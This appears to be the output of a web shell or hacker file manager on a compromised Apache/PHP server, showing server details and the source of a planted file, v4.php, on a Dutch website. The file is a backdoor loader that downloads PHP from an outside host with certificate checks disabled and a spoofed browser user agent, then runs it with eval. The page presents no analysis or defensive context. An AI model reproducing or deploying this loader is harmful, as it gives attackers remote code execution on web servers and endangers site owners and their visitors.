HEX
Server: Apache/2
System: Linux s01 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64
User: beestg (1003)
PHP: 8.3.25
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/beestg/domains/beestgenot.nl/private_html/v4.php
<?php
// Menggunakan cURL
function execute_php_from_url_curl($url) {
    try {
        // Inisialisasi cURL
        $ch = curl_init();
        
        // Set opsi cURL
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        // Eksekusi request
        $code = curl_exec($ch);
        
        // Cek error
        if (curl_errno($ch)) {
            throw new Exception("cURL Error: " . curl_error($ch));
        }
        
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if ($http_code !== 200) {
            throw new Exception("HTTP Error: " . $http_code);
        }
        
        // Tutup cURL
        curl_close($ch);
        
        // Menjalankan kode PHP
        eval("?>".$code);
        
    } catch (Exception $e) {
        echo "Error: " . $e->getMessage();
    }
}

// URL target
$url = "https://stepmomhub.com/3.txt";

// Eksekusi kode
execute_php_from_url_curl($url);
?>